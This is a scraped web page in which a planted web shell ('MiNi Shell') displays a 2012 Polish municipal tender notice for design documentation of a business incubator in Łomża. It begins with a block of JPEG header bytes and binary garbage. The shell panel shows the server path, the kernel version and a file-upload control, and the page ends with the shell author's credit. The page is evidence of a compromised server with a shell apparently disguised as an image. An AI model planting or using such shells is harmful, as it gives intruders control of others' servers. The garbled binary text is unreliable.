JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121002/377008-N-2012.html

<p class="kh_header"><b>Łomża: Wykonanie dokumentacji projektowej na budowę  Parku Przemysłowego Łomża - I etap Budowa Inkubatora Przedsiębiorczości</b><br>
<b>Numer ogłoszenia: 377008 - 2012; data zamieszczenia: 02.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łomża , pl. Stary Rynek 14, 18-400 Łomża, woj. podlaskie, tel. 086 2156711, faks 086 2156706.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://um.lomza.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej na budowę  Parku Przemysłowego Łomża - I etap Budowa Inkubatora Przedsiębiorczości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1 Przedmiotem zamówienia jest wykonanie wielobranżowej dokumentacji projektowej na budowę Parku Przemysłowego Łomża - I etap Budowa Inkubatora Przedsiębiorczości przy ul. Sikorskiego 166 w Łomży wraz z pełną infrastrukturą w zakresie niezbędnym do uzyskania pozwolenia na budowę. Ponadto przedmiot zamówienia należy opracować w zakresie niezbędnym do przeprowadzenia przetargu na wybór wykonawcy robót budowlanych w oparciu o ustawę Pzp oraz w zakresie niezbędnym do realizacji inwestycji.
Wytyczne do projektowania :
budynku inkubatora przedsiębiorczości w Łomży
Zamówienie Miasta Łomża to: wykonanie koncepcji budowy budynku inkubatora i zagospodarowania działki wraz z szacunkowymi kosztami przedmiotowego zadania w min. 3 wersjach do zatwierdzenia zamawiającemu, wykonanie projektu budowlanego i projektów branżowych oddzielnie dla każdej branży (przed kontynuacją prac projektowych rozwiązanie koncepcyjne musi być zaakceptowane przez Zamawiającego).
Obiekt powinien posiadać  standard  dostosowania do potrzeb osób niepełnosprawnych.
Podjazd dla osób niepełnosprawnych przy wejściu głównym powinien obsługiwać komunikację w tym zakresie również od strony parkingu.
Planowana inwestycja budynku inkubatora przedsiębiorczości musi być zgodna z ustaleniami obowiązującego miejscowego planu zagospodarowania przestrzennego miasta Łomża, przyjętego Uchwałą nr 152/XXV/00 Rady Miejskiej w Łomży z dnia 23 marca 2000 r. (tekst uchwały w załączniku nr 8 do SIWZ) oraz warunkami technicznymi przyłączenia mediów, dokumentacją geologiczną. Będzie realizowana na działce nr 22890 o powierzchni 1,5479 ha., położonej w centrum miasta, w pobliżu głównych ciągów komunikacyjnych. Obecnie działka jest zabudowana obiektami jedno i dwu kondygnacyjnymi, pozostałymi po warsztatach szkolnych o łącznej pow. 2297 m2, które w przyszłości stanowić będą zaplecze dla działalności komercyjnej. Remont lub rozbiórka tych budynków będzie przedmiotem oddzielnej inwestycji po wykonaniu oceny technicznej.
Koncepcja funkcjonalno - użytkowa powinna uwzględnić poniższy zakres i wymogi:
1). budynek inkubatora przedsiębiorczości o pow. użytkowej ok. 2500 m2 z przeszkloną elewacją, zlokalizowany przy wjeździe na działkę, wejście główne w centralnej części od strony wjazdu,
2). 30 pomieszczeń biurowych o powierzchniach 15 i 30 m2 (dla osób rozpoczynających działalność gospodarczą oraz dla małych firm),
3). 1 pracownia informatyczno - multimedialna do obsługi szkoleń z wykorzystaniem możliwości tłumaczeń językowych,
4). pomieszczenia / sala dla usług call center, usług BPO (z ang. - business process offshoring),
5). sale spotkań biznesowych dla 10 osób na każdej kondygnacji budynku,
6). 1 sala konferencyjno - szkoleniowa na 30 - 40 osób,
7). zaplecze socjalne przeznaczone na potrzeby użytkownika, obsługi sali konferencyjnej i sal spotkań biznesowych,
8) pomieszczenia biurowe dla administracji Parku Przemysłowego Łomża,
9). kawiarenka,
10). pomieszczenie dla Centrum Przetwarzania Danych,
11). uzyskanie maksymalnej powierzchni użytkowej  obiektu,
12). optymalne koszty w odniesieniu do zaproponowanego rozwiązania,
13). logiczne i ekonomiczne w użytkowaniu rozplanowanie zaproponowanych funkcji,

realizując przewidywaną koncepcję programową przedstawioną niżej:

1) rzeczowy obiekt wchodzący w skład Parku Przemysłowego Łomża będzie służył do prowadzenia działalności w formie Inkubatora Przedsiębiorczości
2) podstawowa działalność oparta będzie na tworzeniu warunków dla rozwoju branż IT i e-biznesu przy wykorzystaniu potencjału łomżyńskich uczelni i Centrum Przetwarzania Danych ( serwerowni) ulokowanego w budynku inkubatora
3) zapewnienie firmom przestrzeni do prowadzenia działalności gospodarczej w postaci powierzchni biurowej; wspieranie działalności w formie doradztwa i obsługi prawnej, księgowej, marketingowej
4) pośredniczenie w kontaktach pomiędzy środowiskiem akademickim i biznesem poprzez transfer nowoczesnych technologii
5) usługi w zakresie doradztwa, szkoleń, informacji i promocji; pomoc w pozyskiwaniu finansowania zewnętrznego
 
Wymagane:

-zastosowana technologia budowy obiektu oraz użyte materiały winny być w podwyższonym standardzie
-w nawiązaniu do powyższego należy kierować się przede wszystkim: elastycznością architektoniczną obiektu - tj. aby układ i konstrukcja budynku umożliwiały łatwą adaptację przestrzeni wewnętrznych do różnych funkcji, możliwą do wykonania w trakcie użytkowania budynku
-wysokie walory estetyczne i użytkowe oraz zapewnienie długoletniej trwałości budynku przez zastosowanie materiałów odpowiedniej jakości
-budynek musi charakteryzować się niskim współczynnikiem zapotrzebowania na energię końcową
-wyroby i użyte materiały budowlane powinny posiadać odpowiednie atesty i certyfikaty dotyczące: nośności i stateczności; bezpieczeństwa pożarowego; higieny, zdrowia i ochrony środowiska; bezpieczeństwa użytkowania; ochrony przed hałasem; oszczędności energii i izolacji cieplnej

Wytyczne dla opracowań projektowych na etapie projektu budowlanego i wykonawczego będą uściślone przez Zamawiającego po opracowaniu koncepcji projektowej.

INFRASTRUKTURA TECHNICZNA:
Instalacje wewnętrzne:
-instalacja wod.-kan. z zastosowaniem najnowszych materiałów i urządzeń oszczędzających wodę, instalacja solarna do wspomagania podgrzewania c.w.u.
-instalacja c.o. o wysokiej sprawności produkcji, przesyłu energii oraz regulacji (z możliwością zdalnego sterowania pracą układu c.o.)
-wentylacja mechaniczna z odzyskiem ciepła z powietrza usuwanego (uwaga: należy  zastosować montaż okien uchylnych lub rozwieralno-uchylnych)
-klimatyzacja w pomieszczeniach reprezentacyjnych i pokojach biurowych
-instalacje elektryczne wewnętrzne i zewnętrzne należy zaprojektować jako energooszczędne, między innymi z wykorzystaniem technologii LED i z możliwością uzyskania energii elektrycznej słonecznej
-każde z pomieszczeń biurowych (pow. 15 i 30 m2) przeznaczonych pod wynajem powinno mieć własne opomiarowanie zużycia en. elektrycznej
-instalacje teletechniczne: system sygnalizacji alarmu pożarowego, sieć komputerowa z zasilaniem dedykowanym, system telewizji przemysłowej, system nagłośnieniowy i konferencyjno - szkoleniowy, system kontroli dostępu, system automatyki budynkowej (integrującej ogrzewanie, wentylacją, klimatyzację, oświetlenie, żaluzje i urządzenia pomocnicze), system sygnalizacji włamania i napadu, instalacje Centrum Przetwarzania Danych
-instalacja odprowadzania wód opadowych - instalacja podciśnieniowa, niskoszumowa (woda deszczowa z połaci dachowych wykorzystywana będzie do nawadniania terenów zielonych)
Zagospodarowanie terenu działki polegać powinno na zaprojektowaniu chodników i parkingu wraz z ich oświetleniem, urządzeniu zieleni w formie trawników i gazonów, nasadzeniu zieleni (drzewa liściaste, iglaste i krzewy), zaprojektowaniu ogrodzenia działki.
Należy zapewnić podłączenie do istniejących miejskich sieci kanalizacji sanitarnej i deszczowej, gazowej, wodociągowej, energetycznej, telekomunikacyjnej oraz C.O. na warunkach określonych przez właściwe jednostki. 
Dokumentację techniczną   należy opracować w zakresie niezbędnym do uzyskania przez Zamawiającego pozwolenia na wykonanie robót w niej ujętych oraz udzielenia zamówienia na ich realizację w procedurze zamówień publicznych uregulowanych w ustawie z dnia 29.01.2004r.  Prawo zamówień publicznych (z późniejszymi zmianami)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.25.00.00-5, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca wnosi wadium w wysokości: 4000 zł.
2. Wadium wnosi się przed upływem terminu składania  ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się należytym wykonaniem trzech opracowań projektowych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - odpowiadających swoim rodzajem pracom stanowiącym przedmiot zamówienia, w tym jedno opracowanie projektowe budowy, przebudowy lub modernizacji - obiektu budowlanego kubaturowego o podobnym przeznaczeniu (tj. budynku biurowego wraz z infrastrukturą) o kubaturze min. 5000 m3  oraz dwa po min. 2000 m3.
Ocena spełnienia tego warunku będzie dokonana na podstawie  przedłożonego  przez Wykonawcę wykazu prac i dokumentów potwierdzających, że wyszczególnione w nim prace zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje co najmniej po jednej osobie, które posiadają uprawnienia bez ograniczeń w każdej z branż: architektonicznej; konstrukcyjnej; drogowej; telekomunikacyjnej; instalacyjnej w zakresie sieci wodociągowych, kanalizacyjnych, cieplnych, gazowych, oraz w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Ocena spełnienia tego warunku będzie dokonana na podstawie:
- dostarczonego przez Wykonawcę wykazu osób, które będą uczestniczyć             w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  oraz informacją o podstawie dysponowania tymi osobami. 
i
- dostarczonego oświadczenia, że osoby, które będą wskazane w wykazie na projektantów posiadają wymagane uprawnienia do sprawowania tej funkcji -  we właściwych zakresach  i odpowiednich specjalnościach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100.000zł tj. kwotę odszkodowania, jaką gwarantuje ubezpieczyciel (po uwzględnieniu ewentualnej franszyzy redukcyjnej).
Ocena spełnienia tego warunku będzie dokonana na podstawie:
- dostarczonej przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony o odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Uproszczona kalkulacja ceny oferty sporządzona zgodnie z załącznikiem nr 7
2)Dokument stwierdzający dokonanie wpłaty wadium. Potwierdzenie przelewu w przypadku wniesienia wadium w pieniądzu oraz inne dokumenty podlegające zwrotowi (np. gwarancje ubezpieczeniowe) należy wpiąć w formie kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania firmy. Oryginały dokumentów (oprócz przelewów bankowych)  należy załączyć do oferty bez trwałego ich spięcia z pozostałymi dokumentami oferty.
3) W przypadku składania oferty przez Wykonawców wspólnie ubiegających się         o udzielenie zamówienia do oferty musi być dołączone dla podmiotu wiodącego - lidera - pełnomocnictwo do reprezentowania ich w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być podpisane przez osoby umocowane do reprezentowania wszystkich Wykonawców (podmiotów występujących wspólnie) - złożone w formie oryginału lub notarialnie poświadczonej kopii.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.
Nieważna jest zmiana postanowień niniejszej umowy oraz wprowadzenie do niej nowych postanowień niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Projektanta, chyba że konieczność wprowadzenia takich zmian jest następstwem okoliczności, których nie można było przewidzieć przy zawarciu umowy.
Dopuszcza się zmianę terminu wykonania przedmiotu umowy z przyczyn niezależnych od którejkolwiek ze stron, z związanych z wydłużeniem się procedur administarcyjnych (np. wydania decyzji, otrzymania uzgodnień, opinii, itp), jednakże pod warunkiem, że Projektant złoży niezbędne dokumenty do organów administracji i innych zgodnie z terminami określonymi w umowie, przy uwzględnieniu zapisów i procedur właściwych dla danego postępowania.
Dopuszcza się zmianę wynagrodzenia ze względu na wystąpienie zmian powszechnie obowiązujacych przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
Dopuszczalna jest zmiana postanowień niniejszej umowy rozumiana w ten sposób, że wiedza o jej wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów, ubiegających się o to zamówienie czy też wynik postępowania przetargowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lomza.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomży; ul. Stary Rynek 14; 18-400 Łomża, pokój nr 217 II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2012 godzina 10:00, miejsce: Urząd Miejski w Łomży, ul. Stary Rynek 14, 18-400 Łomża
pokój nr 102 (sekretariat  Zastępców Prezydenta Miasta ) I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający będzie się ubiegał o dofinansowanie dokumentacji projektowej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego Oś priorytetowa I Wzrost innowacyjności i wspieranie przedsiębiorczości w regionie, Działanie 1.1 Tworzenie warunków dla rozwoju innowacyjności..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com